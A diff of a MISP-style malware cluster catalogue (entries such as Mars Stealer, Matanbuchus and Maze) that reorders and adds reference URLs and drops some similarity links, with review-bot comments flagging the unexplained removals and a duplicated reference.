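Review bot: this hunk silently drops the `related` block that linked ManItsMe to `25db921d-d753-4fb1-b51b-961d7fdae6f4` with a `similar` relationship tagged `almost-certain`, and nothing else in the hunk explains why. If the target cluster no longer exists, or relationships are now generated from another source, the commit message should say so; otherwise the relationship should be kept, since other galaxies and MISP instances may rely on it for correlation.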
@@ -30870,8 +32591,8 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.manjusaka",
- "https://blog.talosintelligence.com/2022/08/manjusaka-offensive-framework.html",
- "https://github.com/avast/ioc/tree/master/Manjusaka"
+ "https://github.com/avast/ioc/tree/master/Manjusaka",
+ "https://blog.talosintelligence.com/2022/08/manjusaka-offensive-framework.html"
],
"synonyms": [],
"type": []
@@ -30902,15 +32623,6 @@
"synonyms": [],
"type": []
},
- "related": [
- {
- "dest-uuid": "bf08965f-03a5-4cf6-83fb-8d3c9e9398ee",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "similar"
- }
- ],
"uuid": "8a97307f-a029-4c43-88e1-debed2b80b14",
"value": "MAPIget"
},
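Review bot: same concern as for ManItsMe: the `related` block pointing MAPIget at `bf08965f-03a5-4cf6-83fb-8d3c9e9398ee` (`similar`, `almost-certain`) is removed with no replacement and no explanation in the visible change. Either document the reason for removing the relationship or restore it.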
@@ -30919,8 +32631,8 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.marap",
- "https://www.proofpoint.com/us/threat-insight/post/new-modular-downloaders-fingerprint-systems-prepare-more-part-1-marap",
"https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-006.pdf",
+ "https://www.proofpoint.com/us/threat-insight/post/new-modular-downloaders-fingerprint-systems-prepare-more-part-1-marap",
"https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-009.pdf"
],
"synonyms": [],
@@ -30934,9 +32646,9 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.mariposa",
- "https://krebsonsecurity.com/2019/10/mariposa-botnet-author-darkcode-crime-forum-admin-arrested-in-germany/",
"https://www.us-cert.gov/ics/advisories/ICSA-10-090-01",
- "https://defintel.com/docs/Mariposa_Analysis.pdf"
+ "https://defintel.com/docs/Mariposa_Analysis.pdf",
+ "https://krebsonsecurity.com/2019/10/mariposa-botnet-author-darkcode-crime-forum-admin-arrested-in-germany/"
],
"synonyms": [
"Autorun",
@@ -30981,23 +32693,26 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.mars_stealer",
- "https://x-junior.github.io/malware%20analysis/MarsStealer/",
- "https://blog.malwarebytes.com/threat-intelligence/2022/04/colibri-loader-combines-task-scheduler-and-powershell-in-clever-persistence-technique/",
- "https://www.bleepingcomputer.com/news/security/new-meta-information-stealer-distributed-in-malspam-campaign/",
- "https://go.recordedfuture.com/hubfs/reports/cta-2022-0802.pdf",
- "https://cert.gov.ua/article/38606",
- "https://3xp0rt.com/posts/mars-stealer",
- "https://www.esentire.com/blog/fake-chrome-setup-leads-to-netsupportmanager-rat-and-mars-stealer",
- "https://www.microsoft.com/security/blog/2022/05/17/in-hot-pursuit-of-cryware-defending-hot-wallets-from-attacks/",
- "https://cyberint.com/blog/research/mars-stealer/",
"https://isc.sans.edu/diary/rss/28468",
+ "https://cyberint.com/blog/research/mars-stealer/",
"https://ke-la.com/information-stealers-a-new-landscape/",
+ "https://www.esentire.com/blog/fake-chrome-setup-leads-to-netsupportmanager-rat-and-mars-stealer",
+ "https://www.bleepingcomputer.com/news/security/new-meta-information-stealer-distributed-in-malspam-campaign/",
+ "https://cert.gov.ua/article/38606",
+ "https://x-junior.github.io/malware%20analysis/MarsStealer/",
"https://www.esentire.com/blog/esentire-threat-intelligence-malware-analysis-mars-stealer",
+ "https://3xp0rt.com/posts/mars-stealer",
+ "https://isc.sans.edu/diary/Arkei+Variants%3A+From+Vidar+to+Mars+Stealer/28468",
"https://blog.morphisec.com/threat-research-mars-stealer",
"https://blog.sekoia.io/mars-a-red-hot-information-stealer/",
+ "https://blog.malwarebytes.com/threat-intelligence/2022/04/colibri-loader-combines-task-scheduler-and-powershell-in-clever-persistence-technique/",
+ "https://go.recordedfuture.com/hubfs/reports/cta-2022-0802.pdf",
+ "https://www.microsoft.com/security/blog/2022/05/17/in-hot-pursuit-of-cryware-defending-hot-wallets-from-attacks/",
+ "https://blog.cyble.com/2022/08/02/fake-atomic-wallet-website-distributing-mars-stealer/",
"https://blog.sekoia.io/privateloader-the-loader-of-the-prevalent-ruzki-ppi-service/",
+ "https://drive.google.com/file/d/14cmYxzowVLyuiS5qDGOKzgI2_vak2Fve/view",
"https://resources.infosecinstitute.com/topic/mars-stealer-malware-analysis/",
- "https://blog.cyble.com/2022/08/02/fake-atomic-wallet-website-distributing-mars-stealer/"
+ "https://threatmon.io/mars-stealer-malware-analysis-threatmon/"
],
"synonyms": [],
"type": []
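Review bot: the newly added `https://isc.sans.edu/diary/Arkei+Variants%3A+From+Vidar+to+Mars+Stealer/28468` is the same ISC diary (28468) as the existing `https://isc.sans.edu/diary/rss/28468` a few lines above it, so the entry now carries that reference twice; keep one form, preferably the titled URL. The other addition `https://drive.google.com/file/d/14cmYxzowVLyuiS5qDGOKzgI2_vak2Fve/view` is a bare file share with no visible title or author, which makes it hard to judge what it is and whether it will stay available; if it mirrors a published report, the canonical publication URL would be the better reference.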
@@ -31023,16 +32738,16 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.masslogger",
- "https://www.gdatasoftware.com/blog/2020/06/36129-harmful-logging-diving-into-masslogger",
- "https://blog.talosintelligence.com/2021/02/masslogger-cred-exfil.html",
- "https://www.seqrite.com/blog/masslogger-an-emerging-spyware-and-keylogger/",
- "https://medium.com/@mariohenkel/decrypt-masslogger-2-4-0-0-configuration-eff3ee0720a7",
- "https://maxkersten.nl/binary-analysis-course/malware-analysis/rezer0v4-loader/",
"https://www.fireeye.com/blog/threat-research/2020/08/bypassing-masslogger-anti-analysis-man-in-the-middle-approach.html",
- "https://twitter.com/pancak3lullz/status/1255893734241304576",
- "https://blog.talosintelligence.com/2021/04/a-year-of-fajan-evolution-and-bloomberg.html",
"https://decoded.avast.io/anhho/masslogger-v3-a-net-stealer-with-serious-obfuscation/",
- "https://fr3d.hk/blog/masslogger-frankenstein-s-creation"
+ "https://blog.talosintelligence.com/2021/02/masslogger-cred-exfil.html",
+ "https://twitter.com/pancak3lullz/status/1255893734241304576",
+ "https://medium.com/@mariohenkel/decrypt-masslogger-2-4-0-0-configuration-eff3ee0720a7",
+ "https://fr3d.hk/blog/masslogger-frankenstein-s-creation",
+ "https://blog.talosintelligence.com/2021/04/a-year-of-fajan-evolution-and-bloomberg.html",
+ "https://www.gdatasoftware.com/blog/2020/06/36129-harmful-logging-diving-into-masslogger",
+ "https://www.seqrite.com/blog/masslogger-an-emerging-spyware-and-keylogger/",
+ "https://maxkersten.nl/binary-analysis-course/malware-analysis/rezer0v4-loader/"
],
"synonyms": [],
"type": []
@@ -31045,26 +32760,18 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.matanbuchus",
- "https://blog.cyble.com/2022/06/23/matanbuchus-loader-resurfaces/",
- "https://research.openanalysis.net/matanbuchus/loader/yara/triage/dumpulator/emulation/2022/06/19/matanbuchus-triage.html",
"https://medium.com/@DCSO_CyTec/a-deal-with-the-devil-analysis-of-a-recent-matanbuchus-sample-3ce991951d6a",
- "https://www.0ffset.net/reverse-engineering/matanbuchus-loader-analysis/",
"https://unit42.paloaltonetworks.com/matanbuchus-malware-as-a-service/",
+ "https://research.openanalysis.net/matanbuchus/loader/yara/triage/dumpulator/emulation/2022/06/19/matanbuchus-triage.html",
+ "https://www.cybereason.com/blog/threat-analysis-msi-masquerading-as-software-installer",
+ "https://r136a1.info/2022/05/25/introduction-of-a-pe-file-extractor-for-various-situations/",
+ "https://www.0ffset.net/reverse-engineering/matanbuchus-loader-analysis/",
"https://isc.sans.edu/diary/rss/28752",
- "https://r136a1.info/2022/05/25/introduction-of-a-pe-file-extractor-for-various-situations/"
+ "https://blog.cyble.com/2022/06/23/matanbuchus-loader-resurfaces/"
],
"synonyms": [],
"type": []
},
- "related": [
- {
- "dest-uuid": "2214b113-6942-494f-94b7-576e74fccdb5",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "similar"
- }
- ],
"uuid": "e30f2243-9e69-4b09-97ab-1643929b97ad",
"value": "Matanbuchus"
},
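Review bot: besides reordering `refs` and adding the Cybereason MSI-masquerading article, this hunk removes the `related` block that linked Matanbuchus to `2214b113-6942-494f-94b7-576e74fccdb5` (`similar`, `almost-certain`); the hunk header (`-26 +18`) shows the net loss is almost entirely that block. As with the ManItsMe and MAPIget hunks, the removal of an existing cross-cluster relationship needs a stated reason in the commit message, or the block should be kept.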
@@ -31099,11 +32806,11 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.matrix_ransom",
- "https://www.blackhoodie.re/assets/archive/Matrix_Ransomware_blackhoodie.pdf",
"https://www.sophos.com/en-us/medialibrary/PDFs/technical-papers/sophoslabs-matrix-report.pdf",
- "https://unit42.paloaltonetworks.com/matrix-ransomware/",
- "https://blogs.blackberry.com/en/2018/11/threat-spotlight-inside-vssdestroy-ransomware",
"https://news.sophos.com/en-us/2019/01/30/matrix-targeted-small-scale-canary-in-the-coal-mine-ransomware/",
+ "https://blogs.blackberry.com/en/2018/11/threat-spotlight-inside-vssdestroy-ransomware",
+ "https://unit42.paloaltonetworks.com/matrix-ransomware/",
+ "https://www.blackhoodie.re/assets/archive/Matrix_Ransomware_blackhoodie.pdf",
"https://jsac.jpcert.or.jp/archive/2020/pdf/JSAC2020_1_tamada-yamazaki-nakatsuru_en.pdf"
],
"synonyms": [],
@@ -31117,8 +32824,8 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.matryoshka_rat",
- "https://www.clearskysec.com/wp-content/uploads/2017/07/Operation_Wilted_Tulip.pdf",
- "http://www.clearskysec.com/tulip/"
+ "http://www.clearskysec.com/tulip/",
+ "https://www.clearskysec.com/wp-content/uploads/2017/07/Operation_Wilted_Tulip.pdf"
],
"synonyms": [],
"type": []
@@ -31144,8 +32851,8 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.maudi",
- "https://paper.seebug.org/papers/APT/APT_CyberCriminal_Campagin/2012/NormanShark-MaudiOperation.pdf",
- "https://contagiodump.blogspot.com/2010/06/may-28-cve-2009-3129-xls-for-office.html"
+ "https://contagiodump.blogspot.com/2010/06/may-28-cve-2009-3129-xls-for-office.html",
+ "https://paper.seebug.org/papers/APT/APT_CyberCriminal_Campagin/2012/NormanShark-MaudiOperation.pdf"
],
"synonyms": [],
"type": []
@@ -31159,9 +32866,10 @@
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.maui",
"https://www.cisa.gov/uscert/ncas/alerts/aa22-187a",
- "https://securelist.com/andariel-deploys-dtrack-and-maui-ransomware/107063/",
+ "https://media.defense.gov/2023/Feb/09/2003159161/-1/-1/0/CSA_RANSOMWARE_ATTACKS_ON_CI_FUND_DPRK_ACTIVITIES.PDF",
+ "https://stairwell.com/wp-content/uploads/2022/07/Stairwell-Threat-Report-Maui-Ransomware.pdf",
"https://www.cisa.gov/uscert/sites/default/files/publications/aa22-187a-north-korean%20state-sponsored-cyber-actors-use-maui-ransomware-to-target-the-hph-sector.pdf",
- "https://stairwell.com/wp-content/uploads/2022/07/Stairwell-Threat-Report-Maui-Ransomware.pdf"
+ "https://securelist.com/andariel-deploys-dtrack-and-maui-ransomware/107063/"
],
"synonyms": [],
"type": []
@@ -31187,115 +32895,117 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.maze",
- "https://research.checkpoint.com/2020/graphology-of-an-exploit-playbit/",
- "https://www.crowdstrike.com/blog/double-trouble-ransomware-data-leak-extortion-part-2/",
- "https://www.splunk.com/en_us/blog/security/gone-in-52-seconds-and-42-minutes-a-comparative-analysis-of-ransomware-encryption-speed.html",
- "https://public.intel471.com/blog/ransomware-as-a-service-2020-ryuk-maze-revil-egregor-doppelpaymer/",
- "https://news.sophos.com/en-us/2020/05/12/maze-ransomware-1-year-counting/",
- "https://www.bleepingcomputer.com/news/security/three-more-ransomware-families-create-sites-to-leak-stolen-data/",
- "https://github.com/albertzsigovits/malware-notes/blob/master/Ransomware/Maze.md",
- "https://blog.talosintelligence.com/2020/12/quarterly-ir-report-fall-2020-q4.html",
- "https://www.secureworks.com/research/threat-profiles/gold-village",
- "https://statescoop.com/baltimore-ransomware-crowdstrike-extortion/",
- "https://cti-league.com/wp-content/uploads/2021/02/CTI-League-Darknet-Report-2021.pdf",
- "https://www.hornetsecurity.com/en/security-informationen-en/leakware-ransomware-hybrid-attacks/",
- "https://news.sophos.com/en-us/2022/03/17/the-ransomware-threat-intelligence-center/",
- "https://labs.sentinelone.com/enter-the-maze-demystifying-an-affiliate-involved-in-maze-snow/",
"https://www.mcafee.com/blogs/other-blogs/mcafee-labs/csi-evidence-indicators-for-targeted-ransomware-attacks-part-ii/",
- "https://www.cert.ssi.gouv.fr/cti/CERTFR-2021-CTI-009/",
- "https://www.fireeye.com/blog/threat-research/2020/05/tactics-techniques-procedures-associated-with-maze-ransomware-incidents.html",
- "https://www.microsoft.com/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself",
- "https://web.archive.org/save/https://news.cognizant.com/2020-04-18-cognizant-security-update",
- "https://www.bitdefender.com/files/News/CaseStudies/study/377/Bitdefender-Whitepaper-WMI-creat4871-en-EN-GenericUse.pdf",
- "https://www.microsoft.com/security/blog/2020/04/28/ransomware-groups-continue-to-target-healthcare-critical-services-heres-how-to-reduce-risk/",
- "https://www.trendmicro.com/en_us/research/20/l/the-impact-of-modern-ransomware-on-manufacturing-networks.html",
- "https://blog.chainalysis.com/reports/ransomware-connections-maze-egregor-suncrypt-doppelpaymer",
- "https://news.sophos.com/en-us/2020/09/17/maze-attackers-adopt-ragnar-locker-virtual-machine-technique/",
- "https://s3.amazonaws.com/talos-intelligence-site/production/document_files/files/000/095/543/original/CTIR_casestudy_1.pdf",
- "https://labs.sentinelone.com/case-study-catching-a-human-operated-maze-ransomware-attack-in-action/",
- "https://www.zdnet.com/article/ransomware-gang-publishes-tens-of-gbs-of-internal-data-from-lg-and-xerox/",
- "https://blogs.quickheal.com/maze-ransomware-continues-threat-consumers/",
- "https://securelist.com/targeted-ransomware-encrypting-data/99255/",
- "https://www.blackberry.com/content/dam/blackberry-com/asset/enterprise/pdf/wp-spark-state-of-ransomware.pdf",
- "https://download.bitdefender.com/resources/files/News/CaseStudies/study/318/Bitdefender-TRR-Whitepaper-Maze-creat4351-en-EN-GenericUse.pdf",
- "https://killbit.medium.com/applying-the-diamond-model-to-cognizant-msp-and-maze-ransomware-and-a-policy-assessment-498f01bd723f",
- "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2021-CTI-009.pdf",
- "https://docs.google.com/spreadsheets/d/1MI8Z2tBhmqQ5X8Wf_ozv3dVjz5sJOs-3",
- "https://sites.temple.edu/care/ci-rw-attacks/",
- "https://www.bleepingcomputer.com/news/security/data-leak-marketplaces-aim-to-take-over-the-extortion-economy/",
- "https://www.splunk.com/en_us/pdfs/resources/whitepaper/an-empirically-comparative-analysis-of-ransomware-binaries.pdf",
- "https://www.bleepingcomputer.com/news/security/maze-ransomware-now-delivered-by-spelevo-exploit-kit/",
- "https://www.fireeye.com/blog/threat-research/2020/07/financially-motivated-actors-are-expanding-access-into-ot.html",
- "https://analyst1.com/file-assets/RANSOM-MAFIA-ANALYSIS-OF-THE-WORLD%E2%80%99S-FIRST-RANSOMWARE-CARTEL.pdf",
- "https://www.bleepingcomputer.com/news/security/maze-ransomware-now-encrypts-via-virtual-machines-to-evade-detection/",
- "https://symantec.broadcom.com/hubfs/The_Ransomware_Threat_September_2021.pdf",
- "https://securityaffairs.co/wordpress/127826/malware/egregor-sekhmet-decryption-keys.html",
- "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf",
- "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/ransomware-maze/",
- "https://ke-la.com/zooming-into-darknet-threats-targeting-jp-orgs-kela/",
- "https://therecord.media/darkside-gang-estimated-to-have-made-over-90-million-from-ransomware-attacks/",
- "https://blog.talosintelligence.com/2019/12/IR-Lessons-Maze.html",
- "https://download.microsoft.com/download/f/8/1/f816b8b6-bee3-41e5-b6cc-e925a5688f61/Microsoft_Digital_Defense_Report_2020_September.pdf",
- "https://www.crowdstrike.com/blog/double-trouble-ransomware-data-leak-extortion-part-1",
- "https://www.bleepingcomputer.com/news/security/maze-ransomware-is-shutting-down-its-cybercrime-operation/",
- "https://cisoclub.ru/doc/otchet-kompanii-group-ib-ransomware-uncovered-2020-2021/?bp-attachment=group-ib_ransomware_uncovered_2020-2021.pdf",
- "https://blog.sensecy.com/2020/08/20/global-ransomware-attacks-in-2020-the-top-4-vulnerabilities/",
- "https://media-exp1.licdn.com/dms/document/C4E1FAQHyhJYCWxq5eg/feedshare-document-pdf-analyzed/0?e=1584129600&v=beta&t=9wTDR-mZPDF4ET7ABNgE2ab9g8e9wxQrhXsxI1cSX8U",
- "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-001.pdf",
- "https://adversary.crowdstrike.com/adversary/twisted-spider/",
- "https://www.bleepingcomputer.com/news/security/darkside-ransomware-made-90-million-in-just-nine-months/",
- "https://www.bleepingcomputer.com/news/security/allied-universal-breached-by-maze-ransomware-stolen-data-leaked/",
"https://www.fireeye.com/blog/threat-research/2021/02/melting-unc2198-icedid-to-ransomware-operations.html",
- "https://www.bleepingcomputer.com/news/security/it-services-giant-cognizant-suffers-maze-ransomware-cyber-attack/",
- "https://www.welivesecurity.com/wp-content/uploads/2020/07/ESET_Threat_Report_Q22020.pdf",
- "https://blog.talosintelligence.com/2020/09/CTIR-quarterly-trends-Q4-2020.html",
- "https://www.mandiant.com/resources/financially-motivated-actors-are-expanding-access-into-ot",
- "https://krebsonsecurity.com/2019/12/ransomware-gangs-now-outing-victim-businesses-that-dont-pay-up/",
- "https://www.cityofpensacola.com/DocumentCenter/View/18879/Deloitte-Executive-Summary-PDF",
- "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf",
- "https://twitter.com/certbund/status/1192756294307995655",
- "https://oag.ca.gov/system/files/Letter%204.pdf",
- "https://www.paloaltonetworks.com/content/dam/pan/en_US/assets/pdf/reports/Unit_42/unit42-ransomware-threat-report-2021.pdf",
- "https://www.telsy.com/wp-content/uploads/Maze_Vaccine.pdf",
- "https://therecord.media/ransomwhere-project-wants-to-create-a-database-of-past-ransomware-payments/",
- "http://www.secureworks.com/research/threat-profiles/gold-village",
- "https://analyst1.com/blog/ransom-mafia-analysis-of-the-worlds-first-ransomware-cartel",
- "https://www.docdroid.net/dUpPY5s/maze.pdf",
- "https://web.archive.org/web/20210305181115/https://cisoclub.ru/doc/otchet-kompanii-group-ib-ransomware-uncovered-2020-2021/?bp-attachment=group-ib_ransomware_uncovered_2020-2021.pdf",
"https://securelist.com/maze-ransomware/99137/",
- "https://www.proofpoint.com/us/blog/threat-insight/first-step-initial-access-leads-ransomware",
- "https://id-ransomware.blogspot.com/2019/05/chacha-ransomware.html",
- "https://www.cyborgsecurity.com/cyborg_labs/hunting-ransomware-inhibiting-system-backup-or-recovery/",
- "https://www.bleepingcomputer.com/news/security/crytek-confirms-egregor-ransomware-attack-customer-data-theft/",
- "https://github.com/albertzsigovits/malware-notes/blob/master/Maze.md",
- "https://ke-la.com/to-attack-or-not-to-attack-targeting-the-healthcare-sector-in-the-underground-ecosystem/",
- "https://www.bleepingcomputer.com/news/security/chipmaker-maxlinear-reports-data-breach-after-maze-ransomware-attack/",
- "https://www.blueliv.com/cyber-security-and-cyber-threat-intelligence-blog-blueliv/escape-from-the-maze/",
- "https://www.brighttalk.com/webcast/7451/408167/navigating-maze-analysis-of-a-rising-ransomware-threat",
- "https://blog.minerva-labs.com/egregor-ransomware-an-in-depth-analysis",
- "https://us-cert.cisa.gov/ncas/alerts/aa20-345a",
- "https://www.trellix.com/en-us/about/newsroom/stories/threat-labs/conti-leaks-examining-the-panama-papers-of-ransomware.html",
- "https://www.accenture.com/us-en/blogs/cyber-defense/evolving-danger-ransomware-extortion",
- "https://blog.redteam.pl/2020/05/sodinokibi-revil-ransomware.html",
+ "https://www.welivesecurity.com/wp-content/uploads/2020/07/ESET_Threat_Report_Q22020.pdf",
+ "https://www.crowdstrike.com/blog/ransomware-preparedness-a-call-to-action/",
+ "https://www.bleepingcomputer.com/news/security/maze-ransomware-now-delivered-by-spelevo-exploit-kit/",
"https://krebsonsecurity.com/2021/08/ransomware-gangs-and-the-name-game-distraction/",
+ "https://www.cyborgsecurity.com/cyborg_labs/hunting-ransomware-inhibiting-system-backup-or-recovery/",
+ "https://www.bleepingcomputer.com/news/security/chipmaker-maxlinear-reports-data-breach-after-maze-ransomware-attack/",
+ "https://www.crowdstrike.com/blog/double-trouble-ransomware-data-leak-extortion-part-2/",
+ "https://www.cityofpensacola.com/DocumentCenter/View/18879/Deloitte-Executive-Summary-PDF",
+ "https://www.bleepingcomputer.com/news/security/maze-ransomware-now-encrypts-via-virtual-machines-to-evade-detection/",
+ "https://twitter.com/certbund/status/1192756294307995655",
+ "https://www.bleepingcomputer.com/news/security/data-leak-marketplaces-aim-to-take-over-the-extortion-economy/",
+ "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf",
+ "https://blog.minerva-labs.com/egregor-ransomware-an-in-depth-analysis",
+ "https://www.fireeye.com/blog/threat-research/2020/05/tactics-techniques-procedures-associated-with-maze-ransomware-incidents.html",
+ "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf",
+ "https://cisoclub.ru/doc/otchet-kompanii-group-ib-ransomware-uncovered-2020-2021/?bp-attachment=group-ib_ransomware_uncovered_2020-2021.pdf",
+ "https://www.microsoft.com/security/blog/2020/04/28/ransomware-groups-continue-to-target-healthcare-critical-services-heres-how-to-reduce-risk/",
+ "https://adversary.crowdstrike.com/adversary/twisted-spider/",
+ "https://github.com/albertzsigovits/malware-notes/blob/master/Ransomware/Maze.md",
+ "https://www.secureworks.com/research/threat-profiles/gold-village",
+ "https://www.bleepingcomputer.com/news/security/it-services-giant-cognizant-suffers-maze-ransomware-cyber-attack/",
+ "https://blogs.quickheal.com/maze-ransomware-continues-threat-consumers/",
+ "https://github.com/albertzsigovits/malware-notes/blob/master/Maze.md",
+ "https://docs.google.com/spreadsheets/d/1MI8Z2tBhmqQ5X8Wf_ozv3dVjz5sJOs-3",
+ "https://www.zataz.com/cyber-attaque-a-lencontre-des-serveurs-de-bouygues-construction/",
+ "https://id-ransomware.blogspot.com/2019/05/chacha-ransomware.html",
+ "https://www.blackberry.com/content/dam/blackberry-com/asset/enterprise/pdf/wp-spark-state-of-ransomware.pdf",
+ "https://www.cert.ssi.gouv.fr/cti/CERTFR-2021-CTI-009/",
+ "https://therecord.media/darkside-gang-estimated-to-have-made-over-90-million-from-ransomware-attacks/",
+ "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-001.pdf",
+ "https://www.fireeye.com/blog/threat-research/2020/07/financially-motivated-actors-are-expanding-access-into-ot.html",
+ "https://symantec.broadcom.com/hubfs/The_Ransomware_Threat_September_2021.pdf",
+ "https://labs.sentinelone.com/case-study-catching-a-human-operated-maze-ransomware-attack-in-action/",
+ "https://sites.temple.edu/care/ci-rw-attacks/",
+ "http://www.secureworks.com/research/threat-profiles/gold-village",
+ "https://blog.talosintelligence.com/2019/12/IR-Lessons-Maze.html",
+ "https://public.intel471.com/blog/ransomware-as-a-service-2020-ryuk-maze-revil-egregor-doppelpaymer/",
+ "https://www.bitdefender.com/files/News/CaseStudies/study/377/Bitdefender-Whitepaper-WMI-creat4871-en-EN-GenericUse.pdf",
+ "https://www.microsoft.com/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself",
+ "https://www.zdnet.com/article/ransomware-gang-publishes-tens-of-gbs-of-internal-data-from-lg-and-xerox/",
+ "https://www.splunk.com/en_us/blog/security/gone-in-52-seconds-and-42-minutes-a-comparative-analysis-of-ransomware-encryption-speed.html",
+ "https://www.docdroid.net/dUpPY5s/maze.pdf",
+ "https://download.microsoft.com/download/f/8/1/f816b8b6-bee3-41e5-b6cc-e925a5688f61/Microsoft_Digital_Defense_Report_2020_September.pdf",
+ "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2021-CTI-009.pdf",
+ "https://statescoop.com/baltimore-ransomware-crowdstrike-extortion/",
+ "https://web.archive.org/web/20210305181115/https://cisoclub.ru/doc/otchet-kompanii-group-ib-ransomware-uncovered-2020-2021/?bp-attachment=group-ib_ransomware_uncovered_2020-2021.pdf",
+ "https://news.sophos.com/en-us/2022/03/17/the-ransomware-threat-intelligence-center/",
+ "https://cti-league.com/wp-content/uploads/2021/02/CTI-League-Darknet-Report-2021.pdf",
+ "https://killbit.medium.com/applying-the-diamond-model-to-cognizant-msp-and-maze-ransomware-and-a-policy-assessment-498f01bd723f",
+ "https://www.crowdstrike.com/blog/double-trouble-ransomware-data-leak-extortion-part-1/",
+ "https://www.crowdstrike.com/blog/maze-ransomware-deobfuscation/",
+ "https://blog.talosintelligence.com/2020/12/quarterly-ir-report-fall-2020-q4.html",
+ "https://research.checkpoint.com/2020/graphology-of-an-exploit-playbit/",
+ "https://news.sophos.com/en-us/2020/05/12/maze-ransomware-1-year-counting/",
+ "https://blog.sensecy.com/2020/08/20/global-ransomware-attacks-in-2020-the-top-4-vulnerabilities/",
+ "https://www.proofpoint.com/us/blog/threat-insight/first-step-initial-access-leads-ransomware",
+ "https://securelist.com/targeted-ransomware-encrypting-data/99255/",
+ "https://analyst1.com/blog/ransom-mafia-analysis-of-the-worlds-first-ransomware-cartel",
+ "https://ke-la.com/how-ransomware-gangs-find-new-monetization-schemes-and-evolve-in-marketing/",
+ "https://www.bleepingcomputer.com/news/security/three-more-ransomware-families-create-sites-to-leak-stolen-data/",
+ "https://www.bleepingcomputer.com/news/security/darkside-ransomware-made-90-million-in-just-nine-months/",
+ "https://securityaffairs.co/wordpress/127826/malware/egregor-sekhmet-decryption-keys.html",
+ "https://www.cert.ssi.gouv.fr/cti/CERTFR-2021-CTI-007/",
+ "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/ransomware-maze/",
+ "https://www.mandiant.com/resources/financially-motivated-actors-are-expanding-access-into-ot",
+ "https://blog.chainalysis.com/reports/ransomware-connections-maze-egregor-suncrypt-doppelpaymer",
"https://www.bleepingcomputer.com/news/security/ransomware-dev-releases-egregor-maze-master-decryption-keys/",
+ "https://www.bleepingcomputer.com/news/security/maze-ransomware-is-shutting-down-its-cybercrime-operation/",
+ "https://labs.sentinelone.com/enter-the-maze-demystifying-an-affiliate-involved-in-maze-snow/",
+ "https://www.brighttalk.com/webcast/7451/408167/navigating-maze-analysis-of-a-rising-ransomware-threat",
+ "https://ke-la.com/zooming-into-darknet-threats-targeting-jp-orgs-kela/",
+ "https://www.trellix.com/en-us/about/newsroom/stories/threat-labs/conti-leaks-examining-the-panama-papers-of-ransomware.html",
+ "https://www.hornetsecurity.com/en/security-informationen-en/leakware-ransomware-hybrid-attacks/",
+ "https://news.sophos.com/en-us/2020/09/17/maze-attackers-adopt-ragnar-locker-virtual-machine-technique/",
+ "https://us-cert.cisa.gov/ncas/alerts/aa20-345a",
+ "https://www.blueliv.com/cyber-security-and-cyber-threat-intelligence-blog-blueliv/escape-from-the-maze/",
+ "https://www.proofpoint.com/us/threat-insight/post/ta2101-plays-government-imposter-distribute-malware-german-italian-and-us",
+ "https://blog.redteam.pl/2020/05/sodinokibi-revil-ransomware.html",
+ "https://analyst1.com/file-assets/RANSOM-MAFIA-ANALYSIS-OF-THE-WORLD%E2%80%99S-FIRST-RANSOMWARE-CARTEL.pdf",
+ "https://ke-la.com/to-attack-or-not-to-attack-targeting-the-healthcare-sector-in-the-underground-ecosystem/",
+ "https://krebsonsecurity.com/2019/12/ransomware-gangs-now-outing-victim-businesses-that-dont-pay-up/",
+ "https://techcrunch.com/2020/03/26/chubb-insurance-breach-ransomware/",
+ "https://intel471.com/blog/conti-ransomware-cooperation-maze-lockbit-ragnar-locker",
+ "https://web.archive.org/save/https://news.cognizant.com/2020-04-18-cognizant-security-update",
+ "https://blog.talosintelligence.com/2020/09/CTIR-quarterly-trends-Q4-2020.html",
+ "https://download.bitdefender.com/resources/files/News/CaseStudies/study/318/Bitdefender-TRR-Whitepaper-Maze-creat4351-en-EN-GenericUse.pdf",
+ "https://www.bleepingcomputer.com/news/security/maze-ransomware-releases-files-stolen-from-city-of-pensacola/",
+ "https://www.splunk.com/en_us/pdfs/resources/whitepaper/an-empirically-comparative-analysis-of-ransomware-binaries.pdf",
+ "https://cocomelonc.github.io/tutorial/2021/09/06/simple-malware-av-evasion-2.html",
"https://www.domaintools.com/resources/blog/the-most-prolific-ransomware-families-a-defenders-guide",
"https://www.bleepingcomputer.com/news/security/maze-ransomware-behind-pensacola-cyberattack-1m-ransom-demand/",
- "https://techcrunch.com/2020/03/26/chubb-insurance-breach-ransomware/",
- "https://www.bleepingcomputer.com/news/security/maze-ransomware-releases-files-stolen-from-city-of-pensacola/",
- "https://news.sophos.com/en-us/2020/09/22/mtr-casebook-blocking-a-15-million-maze-ransomware-attack/",
